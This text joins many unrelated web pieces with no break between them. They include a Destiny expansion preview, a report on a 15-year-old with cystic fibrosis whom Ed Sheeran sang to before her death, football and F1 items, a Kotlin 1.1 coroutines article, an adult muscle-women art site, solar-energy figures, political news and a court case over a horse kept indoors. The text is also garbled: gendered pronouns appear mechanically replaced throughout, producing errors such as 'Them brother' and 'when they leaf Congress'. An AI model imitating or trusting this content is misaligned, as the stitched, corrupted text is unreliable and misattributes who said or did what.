Using my Titan who was maxed out at 34, The Taken King's main campaign took me roughly four or five hours of play to get through, and I was level 39, closing in on 40 by the time I was done. I had also stopped off to take on my Titan specific subclass quest, which must be completed to gain the third subclass for each respective character. Instead of just being granted to you, each class must undertake a quest to obtain their lost subclass while learning more about just what makes them each special. This is another highlight of The Taken King, which is adding meaning to everything you do in Destiny, or at least making the meaning much more apparent, rather than locked behind some lore that you had to use a website or app to see.
Don't lament the relatively short length of the main campaign. When this first act of The Taken King comes to a close, an entire war with the Taken is opened up across everything we've known so far, in addition to gaining access to the Dreadnaught, Oryx's massive mausoleum of a ship, for patrolling. The Dreadnaught is massive and filled with a wealth of secrets for those interested enough to find them. Hidden tunnels, locked chests, and random events litter the maze of corridors, and multiple hours of my time were spent simply delving into these secrets, trying to find out which keys went to which hidden chests, and why there were a bunch of thralls on a secret platform that I couldn't damage even though I was level 40.
Court is Now in Session
The Court of Oryx on the Dreadnaught puts event control into the players' hands, allowing them to spend runes to summon bosses that require different Raid-like strategies to beat. For example, two Knights will have shields the make them immune unless they are close together, or three wizards will continue to respawn unless killed in quick succession. The player who spends the rune gets the privilege of opening the chest for the best rewards, though everyone else is rewarded for their assistance, and assistance from players in the area will definitely be needed, especially as you spend higher tier runes for more difficult encounters.
Yes, I did say rewards, and The Taken King seems to be improving Destiny's gear game. It was weird to break down exotic and legendary gear that I had held onto for so long in favor of blues, and even green items were outclassing my current gear. My attachment to my maxed out Mythoclast didn't last long though, and soon my entire loadout was filled with blues and greens, and the funniest part? I was actually excited by all of it! It felt great to rush towards a blue engram hopeful that it would actually be good gear, instead of just thinking of it as something to break down. It felt good to let go of my attachment to old gear and experiment with the new drops. It felt good to feel excited about getting new gear again. This might be a thorn for some players, but give it a chance. I bet you'll like what you see.
I mentioned that the main campaign is simply act one, and opens up an entire second act, which is a much more expansive war being pitted against the Taken. This includes additional campaign missions, the game's eight new strikes, and Taken making their presence known in a variety of seemingly familiar places such as Earth patrols and existing strikes.
I have to reiterate that in my 15 hours of playtime, I only played as one character (my Titan), and even then, barely scratched the surface of the quests that were made available to me. I didn't play all of the strikes. I didn't play all of the missions. I barely explored the Dreadnaught. And I didn't even get to so much as breathe on the Raid. There's a huge amount of content added in The Taken King, and that doesn't include the fact that all of the Destiny Year One content is still intact and playable as well. Do you still want to talk about a price-to-content or time invested comparison with other games? I sure don't.
I could keep going, but this is just supposed to be an impressions piece, and I do want to save some things for my review, such as the new challenges that the Taken present by twisting familiar enemies into something different or how the strikes now add more read-lite elements to their presentation and execution. I do feel confident in saying that The Taken King is a great addition to Destiny in terms of the content added.
Given that my lengthy first experience was in a controlled environment though, I am curious to see how everything works once Oryx is set loose into the real world. Is the difficulty curve really smoothed out over the light levels? Will gear drops be a little more generous? Will the Raid be another wine and cheese party? Stay tuned, Guardians. We're going to take a little journey to the Dreadnaught, and when we return, we'll come with our final review in tow.
Disclosure: Destiny The Taken King pre-release impressions were obtained at an event at Bungie's studio, provided for by Activision.
Get the biggest daily stories by email Subscribe Thank you for subscribing See our privacy notice Could not subscribe, try again later Invalid Email
The brother of tragic Triona Priestley told how they took their last breath surrounded by loved ones as Ed Sheeran “sang them to sleep”.
The brave 15-year-old, who suffered from Cystic Fibrosis, lost their fight for life today at Temple Street Children's Hospital after the singer granted their dying wish.
Shortly before Triona's death their pals began an online campaign for Sheeran to sing to the teen which went viral.
And tonight their brother Colm told how their sister slipped into a sleep as Ed sang their favourite song Little Bird.
They said: “Myself and my family would like to thank Ed Sheeran and everyone who started and supported the #SongForTri campaign.
“What they gave us and them was a beautiful last moment together.
“Triona slipped into a sleep as Ed was singing to them and passed away shortly afterwards. So Ed Sheeran sang them to sleep. Everyone loved Triona so much and they knew that. Thank you.”
As word broke of Triona's tragic passing, award winning singer Ed paid tribute to them on Twitter.
They wrote: “Rest in peace Triona, so heartbreaking x.”
Triona's pal Lucy Hanlon told how Ed's manager Stuart Camp got in touch following the campaign.
They wrote on Facebook: “It is with great sadness that I have to share with you all today our beautiful angel was taken from us.
“As we all know about the Twitter campaign, Ed's manager Stuart Camp emailed me and today Ed rang Triona and personally sang Little Bird to them as they took their last breaths.
“Triona left us listening to their idol surrounded by all the people who loved them People's respect is incredible. We would like to thank everyone. Goodnight, my angel. Sleep tight.”
Phillip Watt, the CEO of Cystic Fibrosis Ireland (CFI), said Triona was a true fighter.
They added: “It's terrible when somebody so young dies. It's tough for everyone. It leaves family and friends with a massive hole in their lives.
“Triona was very supportive of what we do here at CFI.
“She was involved in a lot of fundraising and so were their family. It's absolutely terrible. I had heard during the week that they were struggling.”
And Mr Watt said it was an incredible gesture by Triona's pals.
They added: “A lot of the time, the support from friends and family can spur people to keep on fighting.
“To see what their friends had done for them is absolutely humbling. It's incredible. It restores your faith in humanity. That's exactly how it is.
“But 15 is no age to pass away. Triona was so young. But it must have been great for them to hear their favourite singer's voice before passing.”
News of Triona's death went around the world last night as thousands sent heartwarming tributes.
One wrote: “Absolutely amazing what Triona's friends & family done for her! May they rest in peace.”
Another added: “RIP my beautiful, beautiful Triona.
“I will never ever forget you & how wonderful a friend you were to me. You're my 65th Rose. I love you.”
Triona had been in the intensive care unit at Temple Street Hospital for nearly two weeks before they eventually passed away.
Friends recalled how they constantly interrupted their family to show them all things Ed Sheeran related.
They told how they would stop their brother Colm's guitar playing and make them learn some of the star's songs, telling them how Ed's music “does something to my heart”.
Cystic Fibrosis is caused by a faulty gene and Ireland has the highest rate of the disease in the world with one in 19 people carriers.
Them brother, posted on Twitter: "My words about Tríona, written a while ago.
"She wanted me to add the guitars (I am) so I hadn't posted a video yet."
ES Football Newsletter Enter your email address Please enter an email address is invalid Fill out this field Email address is invalid You already have an account. Please log in or register with your social account
Jan Vertonghen has admitted that the Tottenham fans are 'not wrong to boo us' after another slip up at White Hart Lane last weekend.
Mauricio Pochettino's men have already lost home matches against Stoke City, West Brom, Newcastle United and Liverpool this season, before a goalless draw against Crystal Palace last time out sparked more frustration among supporters.
In truth, Spurs could have lost the game, owing much to another solid performance from goalkeeper Hugo Lloris to avoid another home defeat - in a game which Vertonghen insists they should be winning.
“The fans are not wrong to boo us," said the defender after the match. "They want to win and I want to win. I understand their frustration.
“I think we should be winning these games as well," they added. "And we try to. We just have to find a way to beat these teams.
“We need to start winning again. Our home form is not good enough. We tried to get back on track against Everton last week and we did – a very important win, I think – but we tried to play the same way and it didn't work. We didn't find a way to break them.”
Kotlin new version introduces a number of new language features – most notably coroutines – and improved support for its JavaScript target, writes Kotlin marketing manager Roman Belov.
Although still considered experimental, one of the key new features in Kotlin 1.1 are coroutines, which are available through the use of three higher-level constructs: async , await , and yield . This is, for example, how you can use async and await to handle asynchronous operations:
// runs the code in the background thread pool fun asyncOverlay() = async(CommonPool) { // start two async operations val original = asyncLoadImage("original") val overlay = asyncLoadImage("overlay") // and then apply overlay to both results applyOverlay(original.await(), overlay.await()) } // launches new coroutine in UI context launch(UI) { // wait for async overlay to complete val image = asyncOverlay().await() // and then show it in UI showImage(image) }
Note the use of launch , which starts a coroutine. In fact, await can only be used from within a coroutine or from a function that is declared with the suspend keyword, which makes the compiler generate the appropriate code to run that function inside a coroutine:
suspend fun workload(n: Int): Int { delay(1000) return n }
In the example above, delay suspends the coroutine without blocking its associated thread.
Coroutines can also be used to lazily generate sequences using yield :
// inferred type is Sequence<Int> val fibonacci = buildSequence { yield(1) // first Fibonacci number var cur = 1 var next = 1 while (true) { yield(next) // next Fibonacci number val tmp = cur + next cur = next next = tmp } } println(fibonacci.take(10).joinToString())
Being experimental, coroutines are opt-in only and their API may change in future releases.
Other significant new features added to Kotlin 1.1 are:
Type aliases, which allow you to define an alternative name for a type.
The :: operator to get a member reference to a method of specific object.
operator to get a member reference to a method of specific object. Data classes can now be extended.
Destructuring support in lambdas.
As to JavaScript support, the main effort for version 1.1 has been aimed to bring JavaScript support on a par with JVM's. This means that all language features are available for both targets, with the exception of reflection, currently not available for JavaScript. In particular:
Large parts of Kotlin standard library can now be used on JavaScript.
Generated code is friendlier to JavaScript tools such as minifiers, optimizers, etc.
The external modifier can be used to declare in Kotlin classes that are implemented in JavaScript.
Kotlin can be tried using its online REPL, or installed in a number of different ways.
Fantasy of Amazons
Art and stories of muscle women
NO charge for use of this site, but must be over 18 of age.
你好! ,er, hi!
Yo!
For the muscle ladies, just click on me
or one of those two bitches...
NOTE: Clicking on any of the above will take you to the new picture-display facility that I now use, none other than Deviant Art.
All the best and new pictures are there now. I'll be using it from now on.
After Deviant Art's page loads, scroll down just a bit to find, in the left column, the blue letters "Browse Gallery" and click on it. That will take you to a fully thumbnail-based gallery.
Note: "Adult Content" pictures will be blanked until you yourself becomes Deviant Art member which HAS NO CHARGE! Once a member, you will be able to browse mine AND other artists' pictures without the block.
And, on THIS site, the story or account of
AMAZON ISLAND (Tulao'otupu)
What if all the world's amazons or amazon-like women got their funds together, bought a deserted (or rundown) Pacific island, registered it as a nation with the United Nations, and set up their own constitution, flag, culture, army, everything?
It would be, of course, strictly matriarchal. Nudity allowed in all places, no more nanny state, cars banned making it a cyclist's and hiker's haven, traditional Polynesian culture adopted, never more than a mile from a sparkling white sand beach! That's Tulao'otupu, amazon haven in the Pacific. They even raise their own army, a peoples' militia, therefore making them truly amazons, one definition of which, after all, means "fighting women."
Pictures Above:
From left to right: An amazon from Japan performs a Kiribati (pronounced Kiribas) island dance.
Center picture: Tulao'otupu's President Nguyen Hue Bich (right) hikes with a huge Tongan amazon from Tonga (left), a "nearby" Pacific island. (Well, several hundred miles away, that's nearby in Pacific terms!) What a president!
Finally, on the right-most picture, a trainer eyes how their student does with a shoulder-mount rocket launcher. The Second Ammendment lives in Tulao'otupu, stronger even than in the United States! That student is just a regular citizen! Citizens are allowed to have military weapons! They just have to deal with their high cost.
Click on any of the pictures, or here, to proceed on to a brief parental warning page and then the story.
AND OTHER STORIES, BELOW...
Stories, especially the intrigueing "velomobile and muscle women" story below, are on this site. Illustrative pictures are still with them as well.
Velomobiles and Muscle women
With their tall, hard bodies and their long, well-muscled legs, velomobiling is a natural for muscle women. Traveling in a velomobile (recumbent enclosed bicycle) at respectable speeds over considerable distances is effortless for these gals with their strength and stamina. There are single-rider velomobiles, 2- or-more-rider velomobiles, touring velomobiles and racing velomobiles. This will be fully explored via picture and story within this site.
Click on the gals and their velomobile or on this text to enter site.
IMPORTANT LINKS
Female muscle art and Yuri Comics
MoonWarrior.com
My art features many muscle women and velomobiles of fantasy. Well, velomobiles are real and can actually be purchased. There is a velomobile dealer right here in the Americas!
Go to Bluevelo.com for models and more information!
As mentioned above, my art features muscle women and velomobile fantasies. Above I introduced a source of real velomobiles. Here is a real muscle woman!  They are Ann Rivieccio and their site is here (click)!
Also, they are the photographer for Muscleangles.com (click here)!
Prophecy Keepers
Presents and compares prophecies of American Indians and other indigenous people including those of ancient Europe. Makes interesting listening. Their site is essentially free. However, donations help them maintain their Internet archive of prophecy-related talks with host, Blue Otter.
For too long, Bernie Ecclestone did not believe that anything needed to be done on Twitter, Facebook or YouTube, for there was no instant money to be made.
F1's stance has changed a bit over the past 12 months though, and much more effort is now being made in trying to engage audiences, with pictures, the odd video, polls and traffic drivers to the official F1 site.
But what it does is just a fraction of what other sports are doing, which have fully embraced the opportunities offered by social media.
There are instant highlight videos, sponsored promotion campaigns, fan contests, hashtag campaigns, features and exclusive access.
Building the fanbase
The gulf between how American sports in particular have boosted their popularity through that type of fan engagement was thrown into the open this week during presentations from leading figures from Twitter and Facebook at a McLaren-hosted #thinkdigital event.
As Dara Nasr, managing director of Twitter UK, said when asked about whether F1's reluctance to fully embrace social media opportunities was an approach mirrored by other sports, or was unique, they said: "Yes, F1 is pretty much alone as a sport.
"If you look at some of the most valuable sports, like NFL, they have been doing it for a few years. Then there is also the Premiership, the Rugby World Cup, Tennis – pretty much any major sport does it.
"I am not one to talk about the intricacies of the deals that F1 has with TV companies, I cannot comment on that, but it is one of the minority in not doing it [social media] properly.
"When people are watching F1, more than 80 percent of them are tweeting about it. So the potential to innovate here with the audience you automatically have is huge."
F1 behind NASCAR
The stats seem to bear out about how F1 is not connecting with as many fans as other sports. F1's current Twitter account has 1.7 million followers – slightly less than NASCAR (2.1 million), which does not have the global TV reach of grand prix racing.
But it's when you compare it to those sports that have fully pushed on with social media to expand their audience, then it puts F1's place in context.
NFL, which does all it can to deliver content on social media platforms, has 14.5 million followers. The NBA has 18.2 million followers. Even MLB has 5.3 million followers.
It's off the back of such huge followings that these sports are able to deliver clever, well-funded sponsorship promotions, having long ago accepted that getting content out to a wider audience (Twitter has 320 million active users a month) is a great way to drive traffic and interest that may well spur people to tune in to the television later on. Video content is of course king.
Facebook growth
The embracing of the Twitter audience is shared on Facebook too, where many sports have woken up to the opportunities afforded by its 1 billion users.
Don't forget there are also 900 million on WhatsApp, 700 million on Facebook Messenger and 400 million on Instagram.
Sports that have embraced the platform well know of the opportunities for targeted content, where football fans from a particular club are pushed with footage and articles tailored solely from the team they support.
How much opportunity is there for F1 chiefs to know that they can send out content specifically targeted at engaging a Kimi Raikkonen or a Fernando Alonso fan, that will deliver the very message they want?
Jennifer Louis, head of Global Creative Strategy at Facebook and Instagram, believes that F1 should not view delivering content on social media as competition to fans watching it on television.
It's about complementing the action, and allowing the fans to get more involved and more passionate about the sport.
Second screen chance
"There is a huge opportunity for them [F1] to do a lot more across the board, because it is a really passionate audience," they told Motorsport.com.
"I know from our perspective on Facebook and Instagram, we can help identify people by passion as well as demographics, so we think it is a massive opportunity to be doing some really exciting stuff with motor racing. You can tap into those passions – and deliver things that those fans really love."
But how do they feel F1 should balance the need to protect the value of television rights – which is a main income driver for Ecclestone – against being so open on social media that you end up giving your content away?
"Football deals with this issue a lot," they said. "We deal with Sky Sports and obviously people pay to have Sky Sports, so they don't want to give their footage all away from free – because otherwise why would you pay?
"But it is looking at the balance of showing people what is the value of paying for that service. So it is about giving them the right content, and the right amount of content, at the key times, so their consideration for purchasing the service, or renewing the service, really makes sense.
"It is not like you have to do all one or all of the other. But it is definitely finding that balance, and showing the value of that content."
The Rugby World Cup had similar rights issues to that which F1 faces, with certain content blacked out for 72 hours. But that merely prompted more innovative social media campaigns.
"Sometimes it is about alternative content," they added. "It's creating companion content to that which you are going to see on television.
"It is something that we have had a lot of success with. So, what do I create that feels like it is part of this event, but not replicating what they are seeing on another platform?"
Teams pushing hard
F1 teams are certainly doing all they can on social media, within the tight confines of right restrictions (especially not being able to use any film footage from races).
McLaren's recent concept car, the 8-bit computer game video it released before the Japanese Grand Prix and the Back to the Future virals it produced before the start of the season are all good examples of a team generating engagement with an audience outside of straight television channels.
Success there could suggest that actually F1 is doing fine on social media – and just look at how #placesalonsowouldratherbe captured the imagination of fans worldwide.
For McLaren, the fact that image went so viral – even if the ultimate message was not so positive – was a great example of where teams can target campaigns in the future.
McLaren group head of digital Rob Bloom said: "Everyone is a director now, and that [the Alonso viral] is a case in point. Who would have known that the photoshopping skills out there could be utilised so effectively in a short burst of time? And some of them were quite good.
"Ultimately the message beneath it was not one that we wanted to support, but it did show the culture of the world we are living in now – of people getting involved and spending some serious time photoshopping some things together.
"And you know what? Ultimately there are some lessons to be taken from it in terms of user-generated content. And we might take that on board one day and use it for one of our own campaigns."
But it is clear from both Twitter and Facebook that what is being done on social media now is just the tip of the Iceberg.
Both Facebook and Twitter agree: there are such big opportunities for F1 still out there going begging.
1984
10. juli 1984 på Colosseum i Oslo. Beat Street, en film om New Yorks myldrende hiphop-miljø, vises. Filmen starter hiphop-interessen i Norge.
– Man måtte ha sett den for å bli definert som en ekte hiphoper, sier Dansken fra Klovner i kamp (Alis, Dr. S, DJ Goldfinger og Dansken) som var seks år da filmen ble lansert.
Filmer som presenterer kulturen – Wild Style, Style Wars og ikke minst Beat Street – blir essensielle.
– Jeg ble ikke interessert i hiphop, jeg ble interessert i rap, sier Joddski (Jørg-1 fra Tungtvann med Poppa Lars).
Filmene inspirerer også Tech Rock fra Warlocks til å begynne med graffiti. – Jeg satt og skisserte Hiphop don't stop hjemme hos bestemoren og bestefaren min.
Jayski fra A-Team/B.O.L.T Warhead mener at hiphop var gunstig for ham som sort ungdom i Norge. – Jeg fikk en identitet. Jeg representerte noe. Da var det full outfit, kassettspilleren med drithøy musikk på skulderen. Det var en komplett pakke.
The sun from Earth. So powerful! NASA/Reuters There's one simple fact that may just change your thoughts on renewable power.
In a single hour, the amount of power from the sun that strikes the Earth is more than the entire world consumes in an year.
To put that in numbers, from the US Department of Energy:
Each hour 430 quintillion Joules of energy from the sun hits the Earth. That's 430 with 18 zeroes after it!
In comparison, the total amount of energy that all humans use in a year is 410 quintillion Joules.
For context, the average American home used 39 billion Joules of electricity in 2013.
Clearly, we have a source of virtually unlimited (the sun won't die out for another 5 billion years or so) clean energy in the form of solar power — we're just not capturing it.
Energy consumption in the US. US EIA Last year, solar only provided 0.39% of the energy used in the US, according to the US Energy Information Administration.
Renewables — including solar, wind, hydropower, biomass and geothermal — accounted for 13% of the total.
There's a big push for renewables, for obvious reasons. They don't increase our carbon footprint or exacerbate global warming, like burning fossil fuels does.
We can't, and shouldn't, continue using oil and coal forever — it is, as Elon Musk has said, "the dumbest experiment in history" because we are changing the Earth's atmosphere without knowing the consequences.
So if solar is so powerful, why are we still using so little of it?
Are solar panels the future? Robert Nickelsberg/Getty Images A large part of the problem boils down to batteries. We haven't developed batteries that can store enough of the energy produced by solar efficiently enough so that it can provide reliable power. Essentially, we need batteries that are good enough to store the incredible amounts of solar energy that are constantly hitting the Earth so we can use it when it's not sunny.
Another issue is our ability to actually capture all of this energy from the sun. Researchers around the world in government labs and at energy companies are developing better solar panels every year, yet the typical array on people's houses today can only convert 14% of the energy it captures into electricity, according to Northwestern University. Lab tests have increased this past 20%, but this performance will likely take years to translate into actual market use.
One day, we'll be able to capture all of the energy that our sun provides. It's just going to take time, investment, and a whole lot of innovation.
Editor's note: In an earlier version of this story, we miscalculated the percent of US energy that came from solar last year. It was 0.39%.
Get the biggest politics stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
Theresa May reportedly belted out the national anthem in the piano bar of a luxury Italian hotel while on holiday.
The Prime Minister and husband Philip were enjoying an escape from 'just about managing' Britain at the five-star Villa Cortine Palace Hotel, on the banks of Lake Garda.
And one night resident pianist Davide Foroni says they couldn't resist playing God Save The Queen when Mrs May entered the lavish bar.
They told the Sun: "As soon as the first notes started they were on their feet with their husband proudly singing along. Everyone stood."
(Image: Facebook)
(Image: AFP)
They said around seventy guests took to their feet for the anthem, with British guests joining in.
The most basic rooms in the luxury destination come complete with glass chandeliers and marble bathrooms.
Prices in high season start at more than £500 a night for a double room.
Prestige Deluxe Rooms with “unparalleled” views of the lake from the large balcony terrace, can run to well over £900 a night. A suite would break the £1000 a night barrier.
The lavish getaway venue's website boasts visitors to their piano bar can expect an "exceptional selection" of whiskey cognac, rum and Italian brandy - accompanied by "delicate and discreet" music.
Iran's president-elect Rowhani warns against foreign intervention in Syria
TEHRAN - Agence France-Presse
Iranian President elect Hasan Rowhani, stands in front of a portrait of the late revolutionary founder Ayatollah Khomeini, during visit of their shrine, just outside Tehran, Iran, Sunday, June 16, 2013. AP Photo/Ebrahim Noroozi
Hassan Rowhani Monday warned against foreign intervention in Syria, insisting that the strife-torn country's crisis should be resolved by its own people, in their first press conference since being elected Iran's new president. "The Syrian crisis must be resolved by the people of Syria. We are against terrorism, civil war, and foreign intervention. Hopefully, with the help of all countries of the region and the world, peace and calm will return to Syria," the cleric said."The Syrian crisis must be resolved by a vote by Syrians. We are concerned by the civil war and foreign interference. The government (of President Bashar al-Assad) must be respected by other countries until the next (2014 presidential) elections and then it is up to the people to decide." Rowhani was on Saturday declared winner of Iran's presidential election, ending an eight year conservative grip on the Islamic republic's adminstration under Mahmoud Ahmadinejad.Rowhani expressed hope Monday that Iran can reach a new agreement with major powers over its disputed nuclear programme, saying a deal should be reached through more transparency and mutual trust.Rowhani, a moderate-conservative cleric who was declared winner of Iran's presidential election on Saturday, also described as unfair and unjustified sanctions imposed against the Islamic republic over the nuclear issue."The idea is to engage in more active negotiations with the 5+1, as the nuclear issue cannot be resolved without negotiations," Rowhani said, referring to the UN Security Council's five permanent members plus Germany.The 64-year-old's victory raised hopes of an easing of strained ties with Western nations, but they used their first news conference on Monday to rule out a halt to their country's controversial enrichment of uranium."This period is over," Rowhani said, referring to international demands for an end to the enrichment.There were "many ways to build trust" with the West, they added, as Iran would be "more transparent to show that its activities fall within the framework of international rules." Rowhani has previously vowed to restore diplomatic ties with the United States, which cut relations in the aftermath of the 1979 seizure of the US embassy by Islamist students.He was helped to victory in Friday's election with the backing of reformists, with thousands of people taking to the streets to celebrate and world powers expressing cautious optimism.Tehran has been engaged since 2006 with the P5+1 -- Britain, China, France, Russia and the United States, plus Germany -- over its nuclear work.Failure to reach an agreement in the negotiations has seen the Islamic republic repeatedly slapped with international sanctions that have hit its economy hard."Threats and sanctions are not effective" Rowhani told reporters on Monday."The sanctions are unfair, the Iranian people are suffering, and our (nuclear) activities are legal. These sanctions are illegal and only benefit Israel," said Rowhani, who is due to replace President Mahmoud Ahmadinejad in early August.Western powers and Israel believe the programme is being used to develop an atomic bomb, but Tehran has always insisted it is for purely peaceful purposes.
Rep. Trey Gowdy's decision to run comes as Rep. Jason Chaffetz notified colleagues that they will leave Congress at the end of June to start a career in television. | AP Photo Gowdy poised to replace Chaffetz as Oversight chief The former Benghazi Committee chairperson steps into another hot political scandal — this time with a Republican president as protagonist.
Rep. Trey Gowdy (R-S.C.) is expected to become the next chairperson of the House Oversight Committee, replacing Rep. Jason Chaffetz (R-Utah) in the high-profile post when they leaf Congress late next month, according to multiple senior House Republicans.
Gowdy, who chaired the House Select Committee on Benghazi, has started buttonholing members of the House Steering Committee in recent days to build support. Five members of that panel, which decides committee assignments, told POLITICO that Gowdy would easily win a race for the job should another member challenge him.
Story Continued Below
If they do clinch the chairpersonship, Gowdy would oversee the sensitive investigation into whether President Donald Trump pressured the FBI to drop a federal investigation of their former national security adviser, Michael Flynn.
Gowdy, a former federal prosecutor, previously chaired the House Select Committee on Benghazi and was an outspoken critic of the Obama administration. This time, however, he'd be the top congressional watchdog for a Republican presidency.
“Trey is more than qualified to be the next chairperson of Oversight,” said Steering Committee member Tom Graves (R-Ga.), who intends to nominate Gowdy for the post. “He has a lot of support from our conference, and given the responsibilities that come with the position, and their past pedigree [as a prosecutor], he's perfect for the job.”
A spokesperson for Gowdy would not confirm their bid for the gavel.
“Rep. Gowdy is talking to members in the conference about the qualities they believe are most important for the next chairperson to possess,” said Amanda Gonzalez in a statement.
Gowdy's decision to run comes a few weeks after Chaffetz notified colleagues that they will leave Congress at the end of June to start a career in television. The Washingtonian reported earlier this week that Chaffetz will head to Fox News.
Upon learning of Chaffetz's departure several weeks ago, GOP leaders begged Gowdy to run. They initially rebuffed their pleas and has often mused to colleagues about how they want to retire and return to South Carolina to spend more time with their family.
When their name first started circulating for the job, many Republicans believed Gowdy would not take it. That view only solidified earlier this week when Gowdy turned down Attorney General Jeff Sessions' invitation to consider becoming the next FBI director.
But Gowdy changed their mind after a number of their colleagues lobbied them to step up, a situation one Steering panel member likened to when Paul Ryan reluctantly agreed to become speaker.
Other lawmakers may decide to run against Gowdy. Oversight is stocked with House Freedom Caucus conservatives who want one of their ringleaders, Rep. Jim Jordan (R-Ohio), to take the position. Jordan, like Gowdy, is also known for their fierce interrogations of Obama administration officials and is more senior than Gowdy. They do not, however, have as many allies on the Steering Committee, which is composed mainly of loyalists to House leaders.
Rep. Dennis Ross (R-Fla.) was considering a bid for the post but told POLITICO they would not run if Gowdy does.
As head of Oversight, Gowdy would be in the cross hairs of one of the most high-stakes political scandals in recent history.
Sign up here for POLITICO Huddle A daily play-by-play of congressional news in your inbox. Email Sign Up By signing up you agree to receive email newsletters or alerts from POLITICO. You can unsubscribe at any time.
The House Intelligence Committee, a panel on which Gowdy also sits, is currently investigating Russian interference in the 2016 presidential election and whether colluded with the Trump campaign. Chaffetz this week launched an inquiry into Trump's sudden firing of FBI Director James Comey and subsequent reports that the president had earlier urged Comey to end the investigation of Flynn.
Gowdy would therefore inherit an investigation that Chaffetz started, which would put them in a politically precarious position. Much of the Republican base believes the Russia controversy is overblown, so Gowdy could come under pressure to clear the president.
Should they find facts that lead them to the opposite conclusion, their career as a Republican lawmaker could be in jeopardy if the base turns against him.
Gowdy experienced some of that type of blowback during the Benghazi investigation, when conservatives accused Gowdy of letting former Secretary of State Hillary Clinton off easy.
Gowdy said Tuesday on Fox News that they want to see the memos Comey wrote about their interactions with Trump before they were fired.
"I want to see the memo [and] I want to talk to Director Comey to determine how contemporaneous their recording of the conversation was," Gowdy said. “What did Director Comey hear? How did they take it? … That can only be done by looking at the memo and talking to Director Comey."
Kyle Cheney contributed to this report.
***Update*** Microsoft has responded to Downes' confirmation, but there seems to be some confusion. Read the update here. You can also read the fully published interview with Steve Downes here.
Halo fans may not be able to continue the fight with Halo 5 in 2014, but Master Chief looks like they will still have a presence on Xbox consoles this year.
In an interview that will publish soon on GameZone, Steve Downes, the long-time voice of Master Chief, told us we shouldn't expect to see Halo 5 in 2014, but that the series will still see at least one release this year.
“I think you may be ahead of yourself on Halo 5,” Downes said. “I wouldn't expect anything until 2015. What you can look forward to this year is an anniversary edition of Halo 2.”
Downes did not clarify if 343 Industries will be the ones developing the game or what consoles the edition will be coming to.
This year marks the 10-year anniversary of Halo 2, a game many still believe helped define Xbox LIVE on Microsoft's original gaming console. Recent reports have echoed what Downes tells us, but this seems to be the first piece of solid evidence yet.
Be sure to check back in with GameZone in the coming days to see our full interview with Master Chief himself, Steve Downes.
——-
Will you be disappointed if Halo 5 doesn't release this year? And are you looking forward to a Halo 2 anniversary edition? Let us know in the comments below.
Last month the Reds boss, in response to comments from the goalkeeper about needing to return to Merseyside to make a decision, said they believed the 31-year-old had already made up their mind.
"Pepe made it very clear when they went to Napoli they were looking to move as they penned a great big letter saying they were going to work with the best manager that he'd worked with and thanked everyone for their time for Liverpool," said Rodgers.
However, Reina, reunited with their former Liverpool manager Rafael Benitez in Italy, denies they have already confirmed their departure.
"That is what the manager says apparently but I have two years left on my contract," they told BBC Sport. "Liverpool got another goalkeeper [Simon Mignolet] and they told me they were happy to loan me for a season.
"It was strange but I don't regret it. The only thing about the letter is that I just could say goodbye in a different way and I couldn't do it [in person]. There are always up and downs in a career and in the last two and a half years at Liverpool there were different methods and perhaps I didn't do as good as I used to with Rafa."
Benitez remains circumspect on Reina's long-term future. "He reads the game very well and is one of the best goalkeepers in the world," the Spaniard told Sky Italia.
"Will they stay at Napoli? They have a clause and we know it - meanwhile they should continue to do well until the end of the season."
An earlier legal blunder resulted in the council's earlier bid to abolish Ms Noble's rights to the animal being thrown out by a sheriff.
The council now wants to obtain legal ownership so it can sell the horse.
The council effectively took the animal into care and legally removed it without Ms Noble' permission after the vet certified the make- shift stables were unsuitable.
It went to a vet known to have concerns about the adult Connemara pony rather than seek an independent, unbiased, opinion about the animal being kept in allegedly cramped living conditions in Stephanie Ann Noble's front room at Broadbay View, Back, Lewis, Stornoway Sheriff Court was told.
The Comhairle acted wrongly when they seized a horse which lived in a residential house for two years, it has been alleged in court.
When the long- running saga returned to court, advocate Stewart Buchanan - representing Ms Noble - maintained the Comhairle was in the wrong by failing to hire a vet who was not involved in the case.
Giving evidence, council animal inspector Kenny Macleod agreed with the lawyer they knew in advance that the vet was unhappy with the horse's accommodation.
Mr Buchanan said: "You know what the opinion was going to be if you go to the same vet."
The council was not "fair and impartial," they stressed.
Mr Macleod insisted the vet would act professionally and unbiased to "give an honest opinion."
Contrary to council's own rules, Ms Noble was not informed they had a right of appeal, when it took the horse, alleged the lawyer.
The animal inspector stated in evidence they could have “gone to the courts to get the animal back” when quizzed about the issue.
Advocate Mark Mohammed for the council insisted there was no right of appeal under the animal health act “so I don‘t know what Mr Buchanan is talking about.”
Mr Buchanan told Mr Macleod that council, as a corporate body, “does not have the power to take the action you said you did on their behalf“ to seize the horse.
Mr Macleod replied: “I also said I am an authorised inspector.”
Mr Buchanan pointed out that - if the horse was suffering then Mr Macleod had legal powers to take it away without getting a vet's opinion.
The advocate stated the vet was known to have concerns in 2012 but the animal inspector did not remove the horse then.
Mr Buchanan stated: "There can be no doubt to this court that the horse was not suffering" at that time.
If it was "you don't need to wait for a vet to alleviate an animal's suffering," they added.
People involved in a dispute with the council should be treated with fairness, consistency, and impartially. In addition, council records and letters should be accurate, stressed the lawyer.
Mr Macleod agreed these things were "fundamental."
The lawyer said the council sent Ms Noble letters stressing it had received "representations" from a vet about their concern over the horse's welfare.
However, these were verbal comments and not a formal complaint from the vet, the court heard.
Thus, council's letters were neither fair nor accurate, suggested Mr Buchanan.
They said: "What is recorded here is a misrepresentation."
They pointed out the evicted animal could have been rehoused at a livery stable in Lewis rather than sent a distance to a different island where Ms Noble “could not get ready access to it.”
That was to prevent them from interfering in its care, responded the animal inspector.
Though Ms Noble is still the official owner, the local authority is forced to pay thousands of pounds in looking after it.
Mr Macleod said the horse was in danger of "not leaving that house alive" if anything happened as the front room was "not a safe environment" with its wooden floor, electrical sockets, unprotected windows and difficult access and exits.
In a previous court sitting, Mr Macleod said the local authority was only interested in the long term health and welfare of the horse.
They agreed with the advocate that was why it did not try to pursue Ms Noble for a potential criminal offence when they allegedly refused to obey an official care notice serviced on them to ensure proper housing for the animal.
The council had “no problems” in handing back the animal if the owner made “alternative arrangements,” they stressed.
Want to learn more about natural selection? Just look for a black peppered moth—Biston betularia.
During the early 19th century in Britain, the moths used to have salt-and-pepper coloring. But over the years black versions of the moth began to prevail. These days, the dark variants are the most common, and geneticists have long speculated that the Industrial Revolution is to blame. Now, new research reveals the gene that made moths turn black and shows that the switch coincided with Britain turning to coal.
